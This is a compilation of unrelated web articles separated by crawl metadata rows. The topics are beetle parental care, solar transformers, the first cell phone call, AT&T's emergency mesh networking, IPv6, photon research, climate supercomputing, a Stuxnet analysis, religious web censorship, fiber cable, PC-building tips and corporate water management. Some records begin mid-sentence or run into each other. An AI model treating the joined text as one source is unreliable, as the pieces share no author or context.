existing offspring rather than investing into the production of additional young. However, how such a resource flow is channelled appropriately is poorly understood. In this study, we provide the first comprehensive analysis of the physiological mechanisms coordinating parental and mating effort in an insect exhibiting biparental care. We show a hormone-mediated infertility in female burying beetles during the time the current offspring is needy and report that this temporary infertility is communicated via a pheromone to the male partner, where it inhibits copulation. A shared pathway of hormone and pheromone system ensures the reliability of the anti-aphrodisiac. Female infertility and male sexual abstinence provide for the concerted investment of parental resources into the existing developing young. Our study thus contributes to our deeper understanding of the mechanisms underlying adaptive parental decisions.
After a short dip in activity in 2013, the construction of large-scale solar power plants is leading the boom for America's solar industry. There are now 7,000 megawatts of solar projects sized over 1 megawatt planned for development in the U.S. over the next year, according to GTM Research. Roughly 1,300 megawatts of those projects have signed contracts that will begin in 2017, after the assumed deadline for a reduction of the federal Investment Tax Credit. Companies building those projects are speeding up development in an effort to capture the 30 percent ITC, and thus opting to bridge the financing gap themselves for a year. It's yet more proof of how important 2016 will be for the solar industry. The solar industry shouldn't just be focused on putting up record numbers. It should be focused on ensuring every single megawatt is built to the highest standards, using the best equipment, in order to deliver the most competitive projects possible. There are many stages of bankability when building a solar power plant. They include design, equipment procurement, installation and commissioning, and maintenance. From the inverter to the transformer to the substation, equipment procurement influences all of these areas in powerful ways. Solar developers understandably focus on levelized cost of energy. But when factoring in all these stages of bankability -- with equipment selection informing every stage -- a project is better measured by total operating costs. We've already discussed how inverters fit into this picture. Let's take a look at another vital piece of equipment for projects: transformers. It takes significant lead-time to find the right site, file the necessary permits, and start designing the project. Thinking about transformer requirements at the earliest stages of development is critical to ultimate success. Timeliness is one key reason. Developers with projects in the beginning stages can easily prearrange an order with a manufacturer like ABB to secure production slots for a very minimal upfront price. That enables the equipment manufacturer to deal with shifting time constraints and move production as needed on their schedule. The longer the dialogue stays open with the supplier, the easier equipment design and delivery becomes. This early engagement also helps the developer fully evaluate whether a transformer is properly tested, designed and suited for the specific solar project requirements. If the time-constrained customer chooses equipment based only on price at the last minute, they run the risk of getting the product delivered late -- and possibly getting a transformer that won't perform optimally over the lifetime of the system. It's also important to anticipate delivery logistics and last-minute design changes. "Thinking about these types of issues can save lots of headaches during installation, when you are under substantial time constraints," said Jay Sperl, a regional business manager for transformers at ABB. Technical factors are another reason to engage with equipment suppliers like ABB early in order to make installation easier, faster and less costly over the life of the project. ABB designs transformers specifically to match the characteristics of an inverter by working closely with manufacturers to understand load characteristics. This dictates simple things like the number of windings involved, and also more complex design characteristics such as how to couple inverters in a pad-mount or substation-like design. There are also ways that pads can be pre-integrated into the transformer, transported, and then put in place on a gravel bed. This can save lots of installation headache if a time-constrained developer does not want to wait for pouring concrete. All of these issues can easily be addressed upfront when designing the project and reaching out to suppliers. They can mean the difference between one week of installation and three weeks of installation. "If you start with the end in mind, what will the equipment look like? What can we do to avoid having surprises later? That will help you engage with suppliers to get an understanding of particular needs in order to benefit you," said Mike Engel, industrial market manager for transformers at ABB. The actual production of a transformer might take a couple of months. The longer lead times come from design and technical review with the customer. Much of the hard work can be done far in advance if the developer engages with the supplier early in the process. Thinking ahead and engaging with suppliers early will also help in the installation and commissioning process. Solar is an elegant technology. But it still takes a complex set of components and logistics to ensure a smooth installation and operation. The equipment supplier should be intimately familiar with all steps in the development cycle. ABB designs every component of a transformer for a specific application, giving the developer a solution with a better lifecycle cost, not just a lower first cost. Over the last few years, ABB has built the elements necessary to bundle a complete solution -- dry- and wet-type transformers, inverters, wireless communications, automation, cybersecurity and installation -- to give customers a turnkey service for solar project developers. Logistics are as crucial as the design itself. If a developer builds a solar plant in a location with harsh weather conditions, components left sitting around the site for too long could get ruined. By optimizing every part of the equipment design and delivery process, ABB can ensure products get to a site when they're needed. This is yet another reason to think about equipment procurement very early in the development cycle. "That's a big part of the benefit ABB brings. We can supply the engineering, the product delivery, the commissioning and the post-installation operation," said Doug Voda, the global segment leader for smart grid medium voltage unit at ABB. A lot is going right for solar in America at the moment. Development activity is at an all-time high and the resource is increasingly competitive with conventional alternatives on an economic basis. In order to ensure a successful 2016 and a transition to a 10 percent ITC, it's imperative that developers procure their equipment with the entire design, installation and commissioning process in mind. "There's always a tremendous push in the fourth quarter of every year. Next year will be even heavier. We understand how the market works and the hurdles developers have to deal with. We can help them work through those at an early stage for a very minimal cost to ensure timely delivery," said Engel. Watch how ABB designs transformers to ensure operational excellence and timely delivery: -- Evaluating the Inverter: Making Sound Equipment Decisions Before the ITC Stepdown
News Article | March 14, 2016
Nature Materials. doi:10.1038/nmat4590 Authors: Ron Feiner, Leeya Engel, Sharon Fleischer, Maayan Malki, Idan Gal, Assaf Shapira, Yosi Shacham-Diamand & Tal Dvir
News Article | August 22, 2016
Nature Materials. doi:10.1038/nmat4662 Authors: Venkatraman Gopalan & Roman Engel-Herbert New findings suggest that the mechanical stretching of layered crystals can transform them from a polar to a nonpolar state. This could spur the design of multifunctional materials controlled by an electric field.
News Article | April 3, 2016
43 years ago today, on April 3, 1973, a Motorola engineer named Martin Cooper made the first cell phone call. At the other end of the line from his 2.5 pound Motorola Dyna-Tac prototype was Cooper's chief rival, Joel S Engel, the head of Bell Labs. "Joel, this is Marty," Cooper said, according to a 2013 interview with the BBC. "I'm calling you from a cell phone, a real handheld portable cell phone." "Portable" is relative, of course. The Dyna-Tac was as big as it was heavy: 9 x 5 x 1.75 inches. Packed inside of this shoebox were 30 circuit boards and a battery with about a half-hour of talk time that required 10 hours of recharging. It had no display, and offered only three features: talk, listen, dial. It was, in a word, dumb. But it worked. The Dyna-Tac had by then already gone through some FCC testing in Washington, DC, and, on the big day, Cooper was to demonstrate the phone to a press conference at the Manhattan Hilton. Motorola was at the time trying to convince the FCC to allocate more frequency bandwidth to companies trying to commercialize the nascent technology. Hence, the PR push. Before heading upstairs to the conference, Cooper decided that he'd better make sure the damn thing worked first. "He picked up the two-pound Motorola handset called the Dyna-Tac and pushed the 'off hook' button," a 2000 New York Times interview with Cooper recalls. "The phone came alive, connecting Mr. Cooper with the base station on the roof of the Burlington Consolidated Tower (now the Alliance Capital Building) and into the land-line system. To the bewilderment of some passers-by, he dialed the number and held the phone to his ear." The DynaTAC 8000x, the world's first cellular phone, modeled after the prototype Cooper used. Photo: Motorola Archives Read more: The First Cell Phone Call Almost Got Bloody By that time, the primitive idea of mobile telephone communications was actually quite old. AT&T had first commercialized a variation in the 1940s called Mobile Telephone Service, which was based on VHF radio communications, the range of frequencies more commonly employed for two-way radio use and television and radio broadcasts. Only a small slice of VHF channels were available to the service and collisions between transmissions were a common and prohibitive occurrence. MTS was essentially a form of two-way radio communication with an operator in the middle that bridged landline callers with mobile callers. A "call" would be announced not by a ring, but by the voice of an operator over the radio saying that they had a call for that specific user. Every user would hear every incoming call and the idea was that they just ignored the ones that weren't for them. The hardware required for MTS also weighed about 80 pounds. Real portability would have to wait for the advent of cellular communications. Here, users can be passed between base stations and frequencies can be continually reused. In addition to truly portable hardware, this means that users can reasonably move around from place to place with some guarantee of service. In the 2000 Times interview, Cooper offered a prediction: "Cellular was the forerunner to true wireless communications. And just as people got used to taking phones with them everywhere, the way people use the Internet is ultimately going to be wireless. With our technology, you will be able to open your notebook anywhere and log on to the Internet at a very high speed with relatively low cost. At the moment, our story is about what a relatively small company is doing with high-tech stuff in Silicon Valley." ''But when people get used to logging on anywhere," he added, "well, that's going to be a revolution.'' | <urn:uuid:ca858519-f324-4283-a91d-e88540da1a07> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/engel-1312750/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00321-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952994 | 2,914 | 3.75 | 4 |
When Hurricane Katrina hit the coast of Louisiana, network traffic doubled for calls coming in and out of New Orleans as family members wanted to check in with loved ones while others called for emergency help.
But what happens when a disaster wipes out all wireless and wireline communication infrastructure? AT&T Labs researchers have developed a solution that could help first-responders and rescue workers locate people who need help and deploy resources without the need for fixed infrastructure like towers, routers, or access points.
AT&T's location-based Mobile-to-Mobile (M2M) casting protocol can map and link smart devices within a specific geographic area, such as a city block or a park. It can track certain people within that area, such as firemen, or be used to search a damaged building for survivors after an earthquake hits.
The protocol creates "ad-hoc" connections with mobile devices into a mesh network where devices are each connected to multiple other devices — without having to rely on the mobile network. The use of GPS helps to locate individual devices within a given area.
The system is designed to handle heavy network conditions, such as a crowd at a college football game or an urban downtown disaster site. Potential services, such as "GeoQuerying", allow responders to locate devices and their users — helpful in search and rescue operations. "GeoAlarming" enables responders to remotely cause devices to emit a loud noise, allowing them to track by sound.
With solutions like a geo-targeting protocol and others similar to it, first responders would not only have faster access to critical information, but also expanded video and data capabilities.
For more information on AT&T's location-based M2M casting protocol visit: research.att.com | <urn:uuid:84e91713-35fa-42f5-a281-1152e9a6bd64> | CC-MAIN-2017-04 | https://www.att.com/gen/press-room?pid=22389 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00285-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940807 | 358 | 2.890625 | 3 |
Internet Society is organizing today 6 of June 2012 the World IPv6 Launch. This will not mean that we will close the Internet on the IPv4 protocol and transfer it to IPv6. It will also not mean that everyone needs to make the transition today. Most of you reading this is already ready to use IPv6. Most of modern computers are able to manage and configure they network interface cards (NIC) to both IPv4 and IPv6 addresses. But what is then IPv6 launch day? Big and important websites and Internet Service Providers participate in today’s day in the way that they will begin the transition from IPv4 and permanently enable IPv6.
Internet Protocol is currently using IPv4 and most people in the world are using it in this moment. We have on this blog all the articles about IP addressing and IP protocol. Basically this is identification system that is used by Internet to find the best routes across world biggest network and send information between end devices. In IPv4 there are four series of four numbers, each from 0 to 255 and they are assigned to each device connected to network. IPv4 allows something around 4.3 billion addresses. That seemed more than enough in 1983. Vint Cerf, Chief Internet Evangelist at Google, and a founding father of the Internet said that this amount of addresses seemed to be more than enough for all future usage. But who could have predicted such a rapid and wide expansion and today we are in the situation that the Internet needs more room than ever. We can say that today every device is connected to Internet: phones, computers, TVs, watches, cars, receivers, fridges, and every one of them needs his own address to be able to communicate. IPv6 is the answer for that problem, the new version of the IP Internet Protocol that is expanding the number of addresses to huge number, 340 trillion trillion trillion addresses. This number is something like this: 340,000,000,000,000,000,000,000,000,000,000,000,000. This protocol will enable future grow of Internet users and it will expand not only the number of supported users but also new technologies and innovative services.
When is the transition happening?
Google says that they believe IPv6 is essential to the continued health and growth of the Internet and that the World IPv6 Launch today marks the start of a coordinated transfering to IPv6 by major websites and Internet service and equipment providers. | <urn:uuid:b1a0e3ad-a2a4-42b1-8627-1aab3345b793> | CC-MAIN-2017-04 | https://howdoesinternetwork.com/2012/ipv6-day | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00101-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.943807 | 497 | 2.53125 | 3 |
Harvard-MIT physics development gives potential for real-life lightsabers
Tuesday, Oct 1st 2013
Environmental control systems in research settings may be bringing one of the most hallowed items from science fiction closer to reality. Star Wars fans may finally get their very own lightsabers after researchers at the Harvard-MIT Center for Ultracold Atoms made a significant discovery while working with photons, in which they created a real-life version of the iconic weapon.
Since Star Wars first premiered in 1977, fans of the series have been fascinated with lightsabers and scientists have spent years attempting to make an accurate replica. While several models have been made with lights and lasers, the product still wasn't correct. As is often in the case with in science experiments, using environmental control systems was instrumental to ensuring optimal conditions to work with the photons. The researchers put rubidium atoms into a vacuum chamber, which was held a few degrees above absolute zero, according to International Business Times. Photons were fired through lasers into the atom clouds, giving off energy to the atoms and exiting combined as one molecule. Under the same conditions, which can be achieved through temperature monitoring, other scientists can duplicate this test while ensuring that they're keeping the atoms in the appropriate environment to produce the same result.
"It's a photonic interaction that's mediated by the atomic interaction," Harvard physics professor Mikhail Lukin told Mother Nature Network. "That makes these two photons behave like a molecule, and when they exit the medium, they're much more likely to do so together than as single photons."
The science of lightsabers
In research labs, it's critically important to keep the environment stable in order to ensure that the study remains unaffected by unintended conditions. With controlled spaces, scientists are better able to predict and influence outcomes. Fluctuations in temperature can skew results and create a lack of consistency across future tests. Using a temperature sensor to ensure the area remains optimal for the tested material creates more accurate results. Medical innovations like vaccines and organ regeneration have also made significant headway through similarly regulated conditions.The development made by Harvard-MIT is significant due to the fact that it has revealed an entirely new state of matter that could influence even more processes and studies. The researchers noted that although they may not be able to make a replica just yet, they do plan to use their discovery for other advancements like quantum computing.
"We do this for fun, and because we're pushing the frontiers of science," Lukin told the International Business Times. "But it feeds into the bigger picture of what we're doing because photons remain the best possible means to carry quantum information. The handicap, though, has been that photons don't interact with each other."
Although the lightsaber that fans have been craving for years may still be a while off, the breakthrough shows promise for a product as well as other potential future innovations. As the researchers explore the molecule's capabilities, Star Wars fans can rest easy knowing that the technology does exist and that new opportunities may stem from the development. | <urn:uuid:a283416e-9fb9-4cdf-8493-c2a383b3c38c> | CC-MAIN-2017-04 | http://www.itwatchdogs.com/environmental-monitoring-news/research-labs/harvard-mit-physics-development-gives-potential-for-real-life-lightsabers-516422 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00495-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960653 | 618 | 2.9375 | 3 |
September is Supercomputing Month at the Department of Energy (DOE), so the government labs are showcasing some of the ground-breaking research that’s come about thanks to advancements in HPC technology and expertise. While it’s difficult to think of a scientific discipline, or even an academic field, that has not benefited from the enabling boost of souped-up computational power, climate research stands out as being particularly dependent on these compute and data-intensive capabilities.
What makes climate change unique is the necessity for large-scale models that have multiple variables, each complex in their own right. These elements include sea temperatures, sea currents, sea ice, the interaction between the surface of the ocean and the atmosphere, air temperatures over land and the impact of clouds. A supercomputer has to take into account all these factors, and more, and calculate all the possible ways they can interact. Simulations can tie up the biggest supercomputers in the world for weeks at a time. The scope and necessity of such an endeavor is matched only by the largest of supercomputing centers, which in the US, means the DOE labs.
As the primary scientific computing facility for the DOE’s Office of Science, National Energy Research Scientific Computing Center (NERSC) – a division of the Lawrence Berkeley National Laboratory – is one of the largest facilities in the world dedicated to basic science research. A sizable portion (12 percent) of the supercomputing resources at NERSC is allocated to global climate change research. That’s nearly 150 million processor-hours of highly-tuned computational might focused on an issue that is critical to humanity’s future.
With each generation of supercomputers exponentially more powerful, climate models grow increasingly detailed. Science Writer Jon Bashor notes that the best global models of the late 1990s treated the western United States from the Pacific Ocean to the Rocky Mountains as a uniform landmass, even though there are topological features, like mountains, deserts and bodies of water, that affect climate. With the advances in hardware and software over the last two decades, today’s models have improved resolution down to 10-kilometer square blocks, while the next generation will drill down to the 2-kilometer level. The more fine-grained the models become, the more accurate the predictions will be.
Climate change is one of the most pressing issues facing our planet today, so accuracy is extremely important. People want to know if the models can be trusted and to what degree. Confidence is especially critical in estimates of anthropogenic climate change. Models are often vetted by checking certain scenarios against real-world results. A common evaluation technique is to “predict” climate sequences that have already occurred. This kind of backwards-looking analysis was taken on by the 20th Century Reanalysis Project, under the leadership of Gil Compo of the University of Colorado, Boulder, and the National Oceanic and Atmospheric Administration’s (NOAA) Earth System Research Laboratory. The project was awarded 8 million processor-hours at NERSC.
The project relies on a database of extreme global weather events from 1871 to the present day, culled from newspaper weather reports, measurements on land and sea for the first decades, and then as technology evolved, there were more detailed measurements from aircraft, satellites and other sensors. The team of top climate scientists fed the data into powerful supercomputers, including those at NERSC and the Oak Ridge Leadership Computing Facility in Tennessee, to create virtual climate time machine.
Simulations based on the model showed a remarkable degree of prescience. “The model accurately predicted a number of extreme weather conditions, including El Niño occurrences, the 1922 Knickerbocker snowstorm that hit the Atlantic Coast (causing the roof of the Knickerbocker Theater in Washington, D.C., to collapse, killing 98 people and injuring 133), the 1930s Dust Bowl and a hurricane that smashed into New York City in 1938,” reports Bashor.
The “predictions” were not only possible, but were calculated with great accuracy. Compo and his team had constructed a map of the the earth’s weather and climate variations since the late 1800s. The next step was using the data assimilation system for real predictions – specifically to anticipate future warming patterns.
As recently reported in Geophysical Research Letters, ongoing research carried out under the 20th Century Reanalysis Project has yielded independent confirmation of global land warming since 1901, providing further evidence of anthropogenic global climate change. Up to this point, the case for global climate warming rested on long-term measurements of air temperature from stations around the world. The Reanalysis Project, however, draws on other historical observations, including barometric pressure from 1901-2010.
“This is really the essence of science,” says Compo. “There is knowledge ‘A’ from one source and you think, ‘Can I get to that same knowledge from a completely different source?’ Since we had already produced the dataset, we looked at just how close our temperatures estimated using barometers were to the temperatures using thermometers.”
The 20th Century Reanalysis Project has been instrumental in boosting the confidence in estimates of past, present and future climate change, according to Compo. And because key variations and trends line up with traditional climate models, it increases the robustness of conclusions based on those data sets.
“If, for some reason, you didn’t believe global warming was happening, this confirms that global warming really has been occurring since the early 20th century,” notes Compo. | <urn:uuid:290752ec-fbe8-4043-b21f-074b309990c8> | CC-MAIN-2017-04 | https://www.hpcwire.com/2013/09/23/supercomputing_enables_climate_time_machine/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00495-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.942896 | 1,156 | 3.734375 | 4 |
Some two months since the discovery of the Stuxnet worm made headlines and started speculations on who is behind it, Symantec‘s researchers have unearthed another piece of the puzzle that tells us a bit more about its likely target.
According to the latest results of the analysis of the worm’s code, Stuxnet was developed to search for industrial control systems that have frequency converter drives from a specific Finnish or Iranian vendor – or from both. These drives function as a power supply that can change the speed of a motor by changing the frequency of the output.
What Stuxnet does is change drastically the operating frequency of these motors every once in a while, sabotaging the workings of the automation system that they run.
Stuxnet begins this procedure after it has been witnessing the drives operating at speeds that go from 807 Hz to 1210 Hz for an undefined period of time.
Researcher Eric Chien says that these these frequencies are actually a lot higher that those required to power, let’s say, a conveyor belt in a factory. “Also, efficient low-harmonic frequency converter drives that output over 600Hz are regulated for export in the United States by the Nuclear Regulatory Commission as they can be used for uranium enrichment,” he notes. “We would be interested in hearing what other applications use frequency converter drives at these frequencies.”
According to Symantec’s updated paper on Stuxnet, the worm springs to life only when it detects 33 or more frequency converter drives from one or both of the two manufacturers – a fact that seems to imply that its developers had specific specific targets in mind and that they are familiar with their networks.
“I imagine there are not too many countries outside of Iran that are using an Iranian device. I can’t imagine any facility in the U.S. using an Iranian device,” said Liam O Murchu, one of Symantec’s researchers that work on analyzing Stuxnet, to Wired. And he’s probably right. This speculation seems to give weight to the theory that the Iranian Bushehr nuclear power plant was Stuxnet’s main target. | <urn:uuid:46ba3d74-7c10-4766-960b-ded45eaa4a5d> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2010/11/17/stuxnet-analysis-points-to-a-specific-target/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00221-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.957642 | 454 | 2.5625 | 3 |
By definition an iconoclast is "a person who attacks cherished beliefs, traditional institutions, etc. as being based on error or superstition; a breaker or destroyer of images, especially those set up for religious veneration." I use a wider definition of iconoclasm, including political iconoclasm - state ‘censorship’ of religious beliefs. As for religious intolerance, I’ll define it as “intolerance against another's religious beliefs”.
Make no mistake, there is nothing new about iconoclasm and intolerance. In fact, religious censors have been around for centuries. Iconoclasm was a huge part of the French Revolution, as people destroyed countless religious artifacts in the name of ‘freedom’. During Russia's October Revolution in 1917, religious materials were destroyed as part of the strategy to overthrow the government and put the Soviets into power. Sadly, the censorship of religious beliefs by state or people is still very much alive and well today.
Filtering religious images
You might think that all of our advances in technology would make it harder for iconoclasts to censor people's religious beliefs. You might think that the Internet is a place where all beliefs will be possible. However, all of that technology actually makes it easier for censors to get their way. On the web, religious images aren’t destroyed; they’re out of sight - purely filtered.
The biggest example? The UK's Digital Economy Bill - or, as it's known around the web, the "UK Internet Censorship Bill". Back in 2010, Parliament passed a bill that was supposed to prevent the theft of copyrighted materials, like illegally downloading music and movies. From there, Parliament extended the bill's reach so that it could also crack down on child pornography. After all, it makes sense to block something that's so illegal, immoral, and dangerous, right?
However, the Digital Economy Bill became broader and broader. At one point, Clause 18 of the bill said that the UK government could block ANY website that's deemed to be undesirable for public consumption. That specific clause was taken out, but its spirit remained. Once the bill was passed, UK Internet service providers were required to prevent their subscribers from accessing certain websites, as determined by the government.
Over the years, the Digital Economy Bill has continued to expand. In 2011, UK government officials met with representatives from Twitter, Facebook, and Blackberry to discuss ways to prevent certain people from using social media. After that, UK mobile providers began blocking certain websites from their smartphones. Mind you, many of those websites have nothing to do with child pornography. Many of them deal with LGBT rights, feminism, and even political satire.
And now, the UK government is taking on religion.
Specifically, they're instituting a country-wide firewall that will block, among other things, "esoteric" websites. By the time 2014 begins, UK Internet service providers will be forced to block websites that discuss things like Wicca, Kabbalah, Taoism, and Mysticism. After all, "esoteric" is an incredibly broad term, and the UK government seems to be painting the broadest picture possible.
Taking down religious concepts
What about America, where freedom of speech is one of the main reasons that the country was founded in the first place?
Back in 2010, the American Civil Liberties Union (ACLU) met with the House Committee on Foreign Affairs as part of the "Strategy for Countering Jihadist Websites". Congress' point was to prevent terrorists from using the web to recruit and carry out missions by taking down all jihadist-related websites. The ACLU, however, began with another point. Their concern was the broad meaning being given to "jihadist". Yes, terrorists commit horrible acts in the name of jihad, but to most Muslims, jihad is actually a spiritual struggle. According to the Koran, it's an individual's struggle to fulfill his religious duties. It's supposed to be an internal struggle, rather than an armed, violent fight on the streets. As a result, not ALL jihad-related websites should be considered a threat. More concerning, the ACLU pointed out that the title ‘Strategy for Countering Jihadist Websites’ “suggests an inherent evil in allowing the Internet to continue to exist in its current open form. Since terrorists may use the Internet to recruit new terrorists, as the narrative goes, Congress must do something to stop such online activity.” Yes, all of the web's capabilities can turn it into a weapon for terrorists, but why must law-abiding people risk being censored because of a few bad apples?
Web iconoclasm, ignorance and religious intolerance doesn't just take place in the UK or in the US, though. In fact, there are no borders for such activities. Remember, iconoclasm led to the defacement of many religious artworks. Indeed, recently, #Op Vaticano led to the defacement of numerous Church websites… Today, the web is a scary combination of the old and the new. It constantly brings us new advancements and new marvels, but it also gives states the power to define what is a right religion and what is a wrong one. The true advancement would be to get past these constraints on freedom of speech and religion. | <urn:uuid:da184989-ced1-4db6-b6d5-51806a400719> | CC-MAIN-2017-04 | http://www.computerworld.com/article/2474932/internet/religious-beliefs-on-the-internet--between-ignorance-and-censorship.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280746.40/warc/CC-MAIN-20170116095120-00037-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.962515 | 1,088 | 2.828125 | 3 |
Duplex Fiber Cable
Duplex fiber cable is designed for general fiber patch cord production where consistency and uniformity are vital for fast, efficient terminations. We have the right duplex fiber cable in many different outside diameter (OD) sizes and meet all tooling and termination requirements.Duplex Fiber Optic Cables consist of two fibers joined by a thin connection between the two jackets. Workstations, fiber switches and servers, fiber optic modems, and similar hardware require duplex cable. They are used in applications where data needs to be transferred bi-directionally. One fiber transmits data one direction; the other fiber transmits data in the opposite direction. Duplex fiber optic cables from FiberStore can be available in single-mode and multimode.
Multimode vs Singlemode Fiber
A “mode” in Fiber Optic cable refers to the path in which light travels. Multimode cables have a larger core diameter than that of singlemode cables. This larger core diameter allows multiple pathways and several wavelengths of light to be transmitted. Singlemode Duplex cables and Singlemode Simplex cables have a smaller core diameter and only allow a single wavelength and pathway for light to travel. Multimode fiber is commonly used in patch cable applications such as fiber to the desktop or patch panel to equipment. Multimode fiber is available in two sizes, 50 micron and 62.5 micron. Singlemode fiber is typically used in network connections over long lengths and is available in a core diameter of 9 microns (8.3 microns to be exact). Many types of multimode fiber optic cable (such as om3 multimode fiber) and singlemode fiber optic cable for sale in FiberStore.
How Fiber Optic Cables Work
The traditional method of data transmission over copper cables is accomplished by transmitting electrons over a copper conductor. Fiber Optic cables transmit a digital signal via pulses of light through a very thin strand of glass. Fiber strands (the core of the fiber optic cable) are extremely thin, no thicker than a human hair. The core is surrounded by a cladding which reflects the light back into the core and eliminates light from escaping the cable.
A fiber optic chain works in the following manner. At the one end, the fiber cable is connected to a transmitter. The transmitter converts electronic pulses into light pulses and sends the optical signal through the fiber cable. At the other end, the fiber cable is plugged into a receiver which decodes the optical signal back into digital pulses.
Advantages & Disadvantages of Fiber Optic Cable
There are many advantages and disadvantages in using fiber optic cable instead of copper cable. One advantage is that fiber cables support longer cable runs than copper. In addition, data is transmitted at greater speeds and higher bandwidths than over copper cables.
The major disadvantages of fiber optic cables are cost and durability. Fiber cables are more expensive than copper cables and much more delicate.
Three Steps To Pick Out A Fiber Optic Cable
So when you go to pick out a fiber optic cable, there are a few things you’ll want to know. First, make sure that the type of connector you purchase matches your input connection. Second, check to see if your device prefers single or multi-mode transfer. Figure out if you need simplex fiber optic cable or duplex fiber optic cable. And finally, choose which length you need. You can discern this by setting up your system and running a string from the speaker or TV to the equipment. Always buy the next larger length rather than one that is on the small side. You won’t regret it! | <urn:uuid:f635c721-9817-44d6-885e-3b0f89b08f93> | CC-MAIN-2017-04 | http://www.fs.com/blog/duplex-fiber-among-fiber-optic-cables.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280746.40/warc/CC-MAIN-20170116095120-00037-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.907135 | 745 | 3.171875 | 3 |
Finally, you've got all your components and you're ready to start building your PC. Before you dive straight in without reading the manuals for your products, let me just take a moment to laugh at you for being silly enough not to read the manuals. While I'm composing myself, here are key safety tips that everyone should know before trying to build a computer.
THE SCOOP: Building your first desktop PC
BUILDING A PC: My components
1.) Read the manual. Seriously. Particularly if you're new to building PCs, this is vital information that can prevent you from plugging something into the wrong place and screwing up the whole build. Your motherboard manual is particularly critical.
2.) Static electricity is bad. Very, very bad. A static spark can damage the fantastically complicated and very exposed circuitry on many of your key components, turning them into expensive, oddly shaped paperweights.
While you can use an anti-static wristband to ground yourself and minimize the risk of shocking anything, it's not required, as long as you are conscientious about grounding yourself by touching something metal regularly while you build. It's hugely important to ensure that your workspace is static-free as well -- don't do this on your thickly carpeted floor, it'll end in tears.
Realistically, you're not likely to wreck anything too terribly with a single tiny spark, but safe is definitely better than sorry.
3.) Don't touch the exposed circuitry. While, like static electricity risk, this danger is often oversold to newbies by experienced builders, it's still a bad habit. Just try to handle things like your motherboard and graphics card by the edges and you should be fine.
4.) Make sure you install the motherboard standoffs in the case! These are little spacers that prevent the board from touching the side of the case. Failing to do this can result in short circuits occurring where soldered parts on the bottom of the board touch the case. (Note: Your case may have some other mechanism to elevate the motherboard. Make sure you read the manual.)
5.) And oh yeah -- READ THE MANUAL.
A word on workspaces: Try for an elevated, static-free space, like a big, clean countertop or table. Emphasis on clean, as you definitely don't want any foreign materials to get into the case. The elevated part is for your own benefit. I built my computer on a hardwood floor, and my knees and back felt like I'd been behind the plate for both games of a doubleheader for days afterwards. Ouch.
I'm not going to give a complete building guide, however. While my machine -- spoiler alert -- turned out just fine with me muddling my way through the process, I don't want to inadvertently give bad or misleading instructions. For comprehensive advice, I'd try one of the following sites:
1.) PCPartPicker.com -- This site allows you to choose components, organize them into a discrete configuration, and even pulls prices from major retailers to allow you get a sense of what you'll likely spend on a given build. What's more, it performs some compatibility checking, alerting you if your chosen CPU doesn't fit into the motherboard, for example. I found it invaluable in tinkering with possible setups.
However, first-timers are still well-advised to have an experienced human look over a build before pulling the trigger. Fortunately, PCPartPicker has a Reddit markup option, allowing for an easy copy and paste to ...
2.) r/BuildAPC -- This community of enthusiastic, dedicated hobbyists will be more than willing to critique your proposed setup before you build it, give advice on alternative parts, and even help you figure out why your shiny new computer isn't turning on. Just make sure you read the right sidebar carefully for posting guidelines and give as much relevant information as possible. Also, be prepared for them to demand pictures of your finished build once it's up and running!
3.) Tom's Hardware -- This is, if anything, an even more comprehensive resource than r/BuildAPC, with active forums, articles, and a wide range of reviews and guides to help out new and experienced builders alike. Its basic guide is frequently recommended as a starting point for those in need of full instructions on a first-time build.
Email Jon Gold at email@example.com and follow him on Twitter at @NWWJonGold.
Read more about data center in Network World's Data Center section.
This story, "Building a PC: safety tips and handy online resources" was originally published by Network World. | <urn:uuid:d1f53566-b61c-49ad-afb2-3c8742e29b2c> | CC-MAIN-2017-04 | http://www.itworld.com/article/2720283/hardware/building-a-pc--safety-tips-and-handy-online-resources.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280891.90/warc/CC-MAIN-20170116095120-00523-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.95078 | 956 | 2.6875 | 3 |
Water Use & Management
Although EMC has a relatively modest water footprint throughout our operations, we take a conscientious approach to conserving this important global resource today and for future generations. We are guided by our focus on minimizing water consumption and managing wastewater in our owned and operated facilities to help protect local water quality. Our owned global manufacturing facilities produce no industrial wastewater. Our greatest potential water impact, however, is directly tied to energy efficiency. By creating more efficient products, we reduce the need for water to cool them and decrease the quantities of water demanded for generating electricity. To learn more, visit Products Stewardship and Efficiency.
Water Risk Assessment
EMC has conducted water risk assessments to evaluate the physical, regulatory and other risks related to water occurring now, or possibly impacting our business in the future.
Water is integrated into a comprehensive corporate risk assessment process incorporating both direct operations and supply chain. A sustainability overlay has been created detailing how water and other sustainability issues impact the likelihood and magnitude of strategic, financial, operational, and reputational risk. Risk registers are created to itemize specific risks for roll-up into the corporate view. To learn more about EMC’s corporate risk assessment process, visit Risk Management.
As part of our assessment, we used the World Business Council on Sustainable Development (WBCSD) Water Tool and the WRI Aqueduct Water Risk Atlas Tool to identify physical, regulatory, and reputational water risks at both the country and river basin level. To learn more, visit EMC 2015 CDP Water Disclosure Response.
